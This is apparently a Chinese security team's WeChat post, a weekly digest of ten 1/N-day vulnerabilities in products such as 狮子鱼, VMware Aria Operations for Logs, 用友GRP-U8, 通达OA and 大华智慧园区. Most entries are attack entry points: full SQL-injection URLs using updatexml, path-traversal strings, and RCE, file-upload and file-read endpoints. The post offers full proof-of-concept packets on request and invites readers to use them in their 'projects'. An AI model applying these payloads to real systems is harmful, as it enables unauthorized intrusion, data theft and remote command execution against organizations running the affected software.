【漏洞汇总】2023.11.27-12.3 1/N Day漏洞汇总【第四期】

       经团队多次沟通一致决定在合法合规的前提下，每周发布部分收录的通用组件1、N Day来进行公众号及团队宣传。

       自2019年至今，团队内部漏洞库数量已达4000+。

       自动化漏洞实时收录1、Nday的来源不仅限于博客、各大安全平台、微信、Github、小蓝鸟等。漏洞库中近百0day，则由十余名头部厂商实验室、红队成员资源共享而来。

       愿关注猫蛋儿的你，每周都能最高效率地吸收最新漏洞。祝你"学有所成,不负韶华"，每次项目都能通过学到的漏洞完成项目，卷过别人保住自己不被裁员！

      2023年11月27日-12月3日部分漏洞简要信息如下，后台回复“漏洞汇总”获取完整POC数据包。

1.狮子鱼3个SQL注入

注入1 /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)注入2 /index.php?s=/Utility/file&do=image&groupid=123)%20or%20updatexml(1,concat(0x7e,user(),0x7e),1)--+注入3 /index.php?s=/Scekill/load_gps_goodslist

2.VMware Aria Operations for Logs反序列化漏洞(CVE-2023-20864)

/api/v2/internal/cluster/applyMembership

3.Telesquare TLR-2005Ksh 路由器 admin.cgi RCE漏洞

/cgi-bin/admin.cgi?Command=setSyncTimeHost&time=

‍4.F22服装管理软件系统openfile.aspx前台任意文件下载

/oa/isprit/module/openfile.aspx?Url=

5.安网智能AC管理系统存在信息漏洞

/actpt_5g.data

6.新开普掌上校园服务管理平台service.action远程命令执行漏洞

/service_transport/service.action

7.用友GRP-U8 软件 U8AppProxy 任意文件上传

/U8AppProxy?gnid=myinfo&id=saveheader&zydm=../../ECd63a

8.通达OA inc/package/down.php接口存在未授权访问漏洞

/inc/package/down.php?id=../../../cache/org

9.万户协同办公平台ezoffice SendFileCheckTemplateEdit.jsp接口存在SQL注入

/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1

10.大华智慧园区管理平台 attachment_downloadByUrlAtt.action 任意文件读取

/portal/itc/attachment_downloadByUrlAtt.action?filePath=

完整漏洞列表见下图

漏洞已收录于团队内部漏洞库（建设于2019年），现已收集4000+实战漏洞

现仅供团队内部使用，每月随机抽取关注者加入社群交流学习。

点击下方名片进入公众号，欢迎关注！